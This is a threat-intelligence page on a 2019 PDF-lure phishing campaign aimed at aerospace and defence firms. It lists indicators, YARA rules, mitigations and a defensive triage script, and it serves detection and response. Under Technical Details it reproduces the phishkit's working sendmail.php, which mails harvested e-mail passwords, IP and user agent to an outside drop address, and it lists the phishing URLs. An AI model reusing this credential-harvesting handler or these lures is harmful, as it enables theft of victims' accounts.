
Targeted phishing - PDF documents / phishkit

Low
Published: Thu May 16 2019 (05/16/2019, 00:00:00 UTC)
Source: CIRCL OSINT Feed
Vendor/Project: type
Product: osint

Description

Targeted phishing - PDF documents / phishkit

AI-Powered Analysis

Last updated: 01/13/2026, 01:08:12 UTC

Technical Analysis

This entry is a CIRCL OSINT Feed (MISP) event from 16 May 2019 describing a targeted credential-phishing campaign that uses PDF documents as the lure and a reusable phishkit for the landing pages. The PDFs (four are PDF 1.5, one is PDF 1.7; a further sample is an Outlook .msg file, most likely the carrier e-mail) contain a clickable link annotation rather than exploit code: the click takes the victim to a fake login page hosted on an unrelated third-party domain, with the impersonated organisation's own domain embedded in the URL path (for example https://www.arbutusroutes.com/document/airbus.com/). The organisations impersonated, and therefore the intended victims, are airbus.com, gd.com, utc.com, standardaero.com, tenova.com, cdnrg.com and akhurst.com, which points at aerospace, defence and industrial engineering targets. In ATT&CK terms this is spearphishing attachment (T1193, since merged into T1566.001) and spearphishing link (T1192, now T1566.002); the source analysis assigns it moderate certainty (50%).

The phishkit itself is captured as New-Updated-docs.zip. Its sendmail.php handler, reproduced under Technical Details, takes the submitted email and pwd POST fields, appends the client IP (trusting an X-Real-IP header if one is present), a GeoIP lookup link and the user agent, and mails the result to jatboss6@gmail.com under a "HACKED BY JATBOSS" banner. In the excerpt shown, exfiltration is by e-mail rather than a server-side log, which makes that mailbox the single most useful indicator for abuse reporting. The lure PDFs share an author string (Author(JAT)) and an identical link rectangle, which the two YARA rules under Technical Details key on; two pairs of ssdeep hashes are near-identical, so the lures were generated from one template with the target name swapped.

The feed records no exploitation of a software vulnerability, and none is needed: the technique relies entirely on the recipient opening the PDF and typing credentials into the fake page, so there is no CVE and nothing to patch. Consistent with that, the detection ratios recorded alongside the VirusTotal links (0/58 up to 10/61) show that signature-based engines barely flag the lures, so detection has to rest on the file-level indicators (hashes, the YARA strings), on the URL pattern and on user behaviour rather than on antivirus verdicts. Indicators are provided in full below. The Low rating on the feed reflects the absence of a vulnerability and of malware, not the consequence of a successful credential theft against the organisations listed; credential compromise followed by lateral movement, internal spearphishing or data exfiltration remains the realistic outcome, and spearphishing of this kind stays relevant as an initial access vector in targeted operations.

Potential Impact

The impersonated organisations named in the indicators (airbus.com, gd.com, utc.com, standardaero.com, tenova.com, akhurst.com, cdnrg.com) place this campaign in aerospace, defence and industrial engineering, and at least one target, Airbus, is European. For organisations in that sector the consequence of a successful lure is a harvested corporate e-mail password, mailed straight to the operator: the kit captures the e-mail address, the password, the victim's IP and user agent, and nothing else, so the immediate impact is on confidentiality (mailbox access, supplier and programme correspondence), with integrity and availability affected only if the attacker uses the account for further phishing, fraud or malware delivery. A PDF that carries only a link, with a detection rate near zero, passes most attachment filters, and the credential page sits on an unrelated third-party domain, so reputation-based URL filtering can miss it too. Compromised accounts enable lateral movement, internal spearphishing from a trusted sender and data exfiltration; for European organisations a compromise that touches personal data also brings GDPR notification duties and reputational damage. Organisations with weaker awareness programmes or without attachment sandboxing face the higher risk. The Low rating on the feed should be read as "no vulnerability, no malware", not as low consequence: the lures are tailored one per victim domain, which raises the chance that at least one recipient clicks.

Mitigation Recommendations

Start with the indicators on this page. Block or sinkhole the listed phishing URLs and their hosts (lulufabllc.com, helpersserer.com, arbutusroutes.com, drpianotellsall.com, office.online-drive.ml) at the web proxy and DNS resolver, and search proxy logs for historical hits, including the path pattern the kit uses: a directory named after your own domain followed by index.php or a trailing slash. Search mail-gateway quarantine and mailbox stores for PDF attachments whose info dictionary carries Author(JAT), and run the two YARA rules under Technical Details on the attachment sandbox. Add the sample hashes to the mail gateway and EDR blocklists, and where a sandbox is available detonate PDF attachments and follow the link annotation instead of relying on signatures, since the recorded VirusTotal ratios show AV engines rarely flag these lures. For any user who opened a lure or visited one of the URLs, reset the password, revoke active sessions and tokens, and review the mailbox for forwarding rules and unexpected sent items. Enforce multi-factor authentication on mail and single sign-on: this kit records only e-mail and password, so MFA alone defeats it unless the operators move to a real-time relay kit, which is the reason to prefer phishing-resistant methods (FIDO2/WebAuthn) for high-value accounts. Keep DMARC, DKIM and SPF enforced on your own domains so the impersonated brand cannot also be the sender, and run awareness exercises modelled on this campaign: an unsolicited "document" PDF whose only content is a link to a login page. Monitor for lateral movement and unusual outbound traffic after any confirmed click, keep a phishing-specific response procedure (rapid credential reset, mailbox forensics), and retain the drop address jatboss6@gmail.com for abuse reporting to the mail provider and for correlation with other kits carrying the JATBOSS banner.
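The file-level checks above can be run mechanically against quarantined attachments. The script below is an added example written for this page, not code from CIRCL, the feed or the phishkit: it hashes a PDF against the sample hashes listed under Technical Details, looks for the two byte patterns the page's YARA rules use (the Author(JAT) info entry and the fixed link rectangle), pulls /URI link targets out of the raw bytes and flags the kit's hosting layout, where the impersonated organisation's domain appears as a directory in the URL path. The embedded PDF is constructed for the demonstration and is not one of the real samples; the assumption that link annotations are stored uncompressed (which the raw-string YARA rules imply for these samples) is stated in the code.

```python
"""Offline triage for the PDF lures on this page (added example, not feed code).

Checks: (1) SHA-256 against the listed sample hashes; (2) the two raw byte
patterns the page's YARA rules use; (3) /URI link targets and the kit's
hosting layout, <third-party host>/<dir>/<impersonated domain>/...
Assumption: link annotations are stored uncompressed, as the raw-string YARA
rules imply; objects inside compressed object streams need inflating first.
"""
import hashlib
import re
import sys
from pathlib import Path
from urllib.parse import urlsplit

# Indicators copied from the page's Technical Details section.
JAT_AUTHOR_MARK = b"<</Author(JAT)"
JAT_LINK_RECT = b"Rect[ 195.05 428.59 411.79 489.67]"
KNOWN_SHA256 = {
    "28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02",
    "56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936",
    "ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73",
    "0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132",
    "c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2",
    "f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a",
    "9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58",
}
KNOWN_PHISHING_URLS = {
    "https://lulufabllc.com/doc/cdnrg.com/index.php",
    "https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php",
    "https://www.arbutusroutes.com/document/standardaero.com/",
    "https://www.arbutusroutes.com/document/utc.com/",
    "https://www.arbutusroutes.com/document/gd.com/",
    "https://www.arbutusroutes.com/document/airbus.com/",
    "http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php",
    "https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php",
    "https://arbutusroutes.com/ssl/akhurst.com/index.php",
}

# /URI (literal string) of a link action; tolerates backslash-escaped parens.
_URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
# A path segment that looks like a hostname, e.g. "airbus.com" or "www.tenova.com".
_HOSTLIKE_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)


def extract_uris(pdf_bytes: bytes) -> list:
    """Return every /URI target found in the raw PDF bytes, in order."""
    return [m.group(1).decode("latin-1") for m in _URI_RE.finditer(pdf_bytes)]


def impersonated_domain(url: str):
    """Return the first directory segment of the URL path that looks like a
    hostname, or None. The last segment (a filename such as index.php, or the
    empty string after a trailing slash) is never considered."""
    for seg in urlsplit(url).path.split("/")[:-1]:
        if _HOSTLIKE_RE.fullmatch(seg):
            return seg
    return None


def triage_pdf(pdf_bytes: bytes) -> dict:
    """Run all checks on one file and return the findings with a verdict."""
    sha256 = hashlib.sha256(pdf_bytes).hexdigest()
    suspicious = []
    for uri in extract_uris(pdf_bytes):
        dom = impersonated_domain(uri)
        known = uri in KNOWN_PHISHING_URLS
        if dom or known:
            suspicious.append({"uri": uri, "impersonated": dom, "known_ioc": known})
    findings = {
        "sha256": sha256,
        "known_sample": sha256 in KNOWN_SHA256,
        "jat_author": JAT_AUTHOR_MARK in pdf_bytes,
        "link_rect": JAT_LINK_RECT in pdf_bytes,
        "suspicious": suspicious,
    }
    reasons = [k for k in ("known_sample", "jat_author", "link_rect") if findings[k]]
    if suspicious:
        reasons.append("suspicious_link")
    findings["reasons"] = reasons
    findings["verdict"] = "malicious" if reasons else "no_match"
    return findings


# Constructed minimal lure for the demonstration, not one of the real samples:
# Author(JAT) info dictionary, the fixed link rectangle, one listed URL.
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj\n<</Type/Catalog/Pages 2 0 R>>\nendobj\n"
    b"2 0 obj\n<</Type/Pages/Kids[3 0 R]/Count 1>>\nendobj\n"
    b"3 0 obj\n<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Annots[4 0 R]>>\nendobj\n"
    b"4 0 obj\n<</Type/Annot/Subtype/Link/Rect[ 195.05 428.59 411.79 489.67]"
    b"/A<</S/URI/URI(https://www.arbutusroutes.com/document/airbus.com/)>>>>\nendobj\n"
    b"5 0 obj\n<</Author(JAT)/Producer(constructed sample)>>\nendobj\n"
    b"trailer\n<</Root 1 0 R/Info 5 0 R>>\n%%EOF\n"
)

if __name__ == "__main__":
    targets = [(p, Path(p).read_bytes()) for p in sys.argv[1:]] or [("<built-in>", SAMPLE_PDF)]
    for name, data in targets:
        f = triage_pdf(data)
        print(f"{name}: {f['verdict']} {f['reasons']} sha256={f['sha256']}")
        for s in f["suspicious"]:
            print(f"  link {s['uri']} impersonates={s['impersonated']} listed={s['known_ioc']}")
```

Run it with file paths as arguments; with none it triages the built-in constructed sample. A hit on jat_author, link_rect or a listed URL is specific to this campaign; the domain-in-path heuristic is generic and should be treated as a lead to verify, since some legitimate document portals also use customer domains as folder names.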


Technical Details

Uuid
5cdd3938-7134-4908-9552-173cc0a8016e
Original Timestamp
1764973857 (2025-12-05 22:30:57 UTC; this is the feed record's timestamp, not the 2019 event date)

Indicators of Compromise

Yara

Two rules from the feed, reformatted from the single-line form in which they were rendered (comments added; both match raw, uncompressed PDF object syntax only):

rule PDF_LIFT
{
    // Raw-byte match on the /Rect of a link annotation, used by the
    // feed's authors as a signature for the lure PDFs.
    strings:
        $a = "Rect[ 195.05 428.59 411.79 489.67]"
    condition:
        all of them
}

rule PDF_JAT_AUTHOR
{
    // Generic rule to find the common JAT author in the PDF info dictionary.
    strings:
        $a = "<</Author(JAT)"
    condition:
        all of them
}

Email

jatboss6@gmail.com
  Address the harvested credentials are mailed to (the $send value in the kit's sendmail.php).

Url

Phishing links. Each landing page is hosted on a third-party domain; in most cases the path carries the domain of the organisation being impersonated:

https://lulufabllc.com/doc/cdnrg.com/index.php
https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php
https://www.arbutusroutes.com/document/standardaero.com/
https://www.arbutusroutes.com/document/utc.com/
https://www.arbutusroutes.com/document/gd.com/
https://www.arbutusroutes.com/document/airbus.com/
https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php
https://arbutusroutes.com/ssl/akhurst.com/index.php

Older phishing link; the login page was mirrored on Wed, 12 Sep 2018 06:29:39 GMT:

http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php

Target org

Organisations impersonated by the lures:

airbus.com
tenova.com
standardaero.com
gd.com
utc.com
cdnrg.com
akhurst.com

File

Filenames as attached to the event (the samples are named by their SHA-256), plus the phishkit archive and its mailer script:

28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
New-Updated-docs.zip
sendmail.php

Size in-bytes

Sample sizes in bytes, in the feed's order:

293456
283714
252891
447466
156088
485888
3525231

Float

Per-sample float values from the feed. The feed does not label them; values this close to 8 are consistent with Shannon entropy in bits per byte of the mostly compressed PDF content, which is an assumption, not something the page states:

7.9916395623958
7.9880939695683
7.9916147992407
7.991595563552
7.9280918012902
7.9068746522467

Hash

Digests in the feed's order, four per sample (md5, sha1, sha256, sha512; algorithm identified by digest length, and the md5/sha256 pairing confirmed by the malware-sample entries below):

Sample 1
  md5    9a58b7f8ba04c32c027126379456e444
  sha1   b49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214
  sha256 28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02
  sha512 1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f

Sample 2
  md5    164db8d1fe5f2ea9dd3ea826b2f0b808
  sha1   890efaa698f4d43aad15c3dbacb6c01544fd3e27
  sha256 56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936
  sha512 27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3

Sample 3
  md5    08b49fb9882bfc8f69beb594fa543c8a
  sha1   201e85d6bc519ecc6dece75b2586e761a56db6a7
  sha256 ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73
  sha512 b4a446c95e7239a3e491ee38e77ce8e1e96c27ca9c1cc25ca941643f366c62f81eb9942a1d80304bfc321c24cef86288f315bf97eb5f3738ad3618fbb6c86eb8

Sample 4
  md5    1baa024f9cfab48b92c297aa406c91b5
  sha1   7d5a1dc90d535e3cc552d0db02841d28fb1ae773
  sha256 0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132
  sha512 4137bd777e8167e964d3ebae98720cbf532cc0afac726522a668949dbc841150aa4aa600813142bb9ec6f999bd97ddd07b9bdf885034699305381382cfba6416

Sample 5
  md5    da877f4f7335264b03ac72fca5b305dc
  sha1   435aa871cdd772072390d9baceaa8d832208d710
  sha256 c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2
  sha512 6ff7cb6507259bc322a8d400c34060d17e33483dab5b035d519447b2756a49da236acc54a413227168d7926ce758dfb169c8d92d58d2cc9b0c81cb6de383a1fd

Sample 6
  md5    b830fd2997e1f124f34d77ff1fa9b89e
  sha1   ea43350c37e0c266c12d0fd53643cf94dd58c1f7
  sha256 f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a
  sha512 24a7f8c2e5d774554c69113b4b81a9755113db1ac620e0d9f0339919a0982e7c169446cb0fe4f3a9232f757a9ccd82676f55207cc044033e3485d1f22d965de1

Sample 7, New-Updated-docs.zip (its md5 matches the malware-sample entry for the archive)
  md5    b7245bf657e792328aaacbc6f75d1555
  sha1   bc32ff3213011db8278bfcd21b1dc432ded499d3
  sha256 9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58

Malware sample

Samples attached to the event, as filename|md5:

28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02|9a58b7f8ba04c32c027126379456e444
56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936|164db8d1fe5f2ea9dd3ea826b2f0b808
ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73|08b49fb9882bfc8f69beb594fa543c8a
0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132|1baa024f9cfab48b92c297aa406c91b5
c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2|da877f4f7335264b03ac72fca5b305dc
f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a|b830fd2997e1f124f34d77ff1fa9b89e
New-Updated-docs.zip|b7245bf657e792328aaacbc6f75d1555

Mime type

File types of the six sha256-named samples:

PDF document, version 1.5 (4 samples)
PDF document, version 1.7 (1 sample)
CDFV2 Microsoft Outlook Message (1 sample)

Ssdeep

Fuzzy hashes of the samples. Two pairs are near-identical (the two 12288: hashes, and the two 6144: hashes that share the "xer4" and "H9Oe6Hl" chunks), which is what one template with the target name swapped looks like:

6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ
6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/
6144:mc67OzUcoXxC24wOOLDbjRC4xzE7mkHNw+4je6iMllT:mcNzxer4fiDbjRhGDH9Oe6Hl1
12288:Jn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3FM:Jn4iQUwQDkp6hdVM
3072:zr3i3ArGdqMW/5DsvvqTfAL3LKhMbgfGSL2YxPfmXfj:H3i3ASXQgvSA/K7XiYxG7
12288:Yn4ijMb7m7MUeGApKWxw1RFn/68R4V6Sp22leUWd3F:Yn4iQUwQDkp6hdV

Text

Free-text attributes attached to the samples (tags and analyst verdicts as recorded in the feed):

Adobe-Standard-Encoding
Malicious
Suspect
JATBOSS
PHP
Malicious

sendmail.php from the phishkit, the kit's own code reformatted from the single line in which the feed renders it, with comments added. $message, $useragent and $country are not defined in this excerpt; the kit sets them elsewhere or the mail simply goes out with empty fields.

<?php
// Prefer a reverse-proxy supplied client address, otherwise the socket peer.
if (isset($_SERVER['HTTP_X_REAL_IP'])) {
    $ip = $_SERVER['HTTP_X_REAL_IP'];
} else {
    $ip = $_SERVER['REMOTE_ADDR'];
}
// Credentials straight from the fake login form's POST fields.
$message .= "|----------| E M A I L |--------------|\n";
$message .= "Online: ".$_POST['email']."\n";
$message .= "pass: ".$_POST['pwd']."\n";
// Victim context: IP, a GeoIP lookup link and the browser user agent.
$message .= "|--------------- I N F O | I P -------------------|\n";
$message .= "|Client IP: ".$ip."\n";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
$message .= "User Agent : ".$useragent."\n";
$message .= "|----------- HACKED BY JATBOSS --------------|\n";
// Exfiltration is by e-mail to the operator's drop address; nothing is written to disk here.
$send = "jatboss6@gmail.com";
$subject = "$country | $ip";
{
    mail("$send", "$subject", $message);
}
?>

Detection ratios (engines flagging the file / engines run), one per sample. Reading these plain "text" values as the ratios from the seven VirusTotal analyses linked below is an inference from their count and format, not something the feed labels:

1/56
0/58
2/59
1/54
10/61
1/60
0/58

Gender

Prefer not to say

Datetime

Timestamps attached to the samples, as given in the feed:

2019-05-16T08:54:33
2019-05-13T02:37:30
2019-05-13T02:37:43
2019-05-15T17:45:13
2019-05-16T09:42:04
2019-05-15T20:41:35
2019-05-13T02:37:29

Link

VirusTotal analyses of the seven samples:

https://www.virustotal.com/file/f2676b94952018c220ee352b9857bc5ad62195b2d15cdfaf54fa5c5985d6934a/analysis/1557996873/
https://www.virustotal.com/file/56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936/analysis/1557715050/
https://www.virustotal.com/file/28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02/analysis/1557715063/
https://www.virustotal.com/file/0fb825db2262d98e29846fa67171e3450666af9c0a6c31eaf8d7c84539be9132/analysis/1557942313/
https://www.virustotal.com/file/9c4f9755fc183f6ad4ad4d600a0a3ed9230900152245f924b9106202ce543c58/analysis/1557999724/
https://www.virustotal.com/file/c052025b442995f04a68b1b6b2007c36dbf47448c08dc249219a7f3eebd369c2/analysis/1557952895/
https://www.virustotal.com/file/ddcf49145d8c78198138a488b7f99bb4f760777be41b293138e4d5b531cebc73/analysis/1557715049/

Threat ID: 6933b2702271496a0fa16ea3

Added to database: 12/6/2025, 4:34:56 AM

Last enriched: 1/13/2026, 1:08:12 AM

Last updated: 2/6/2026, 2:23:21 AM
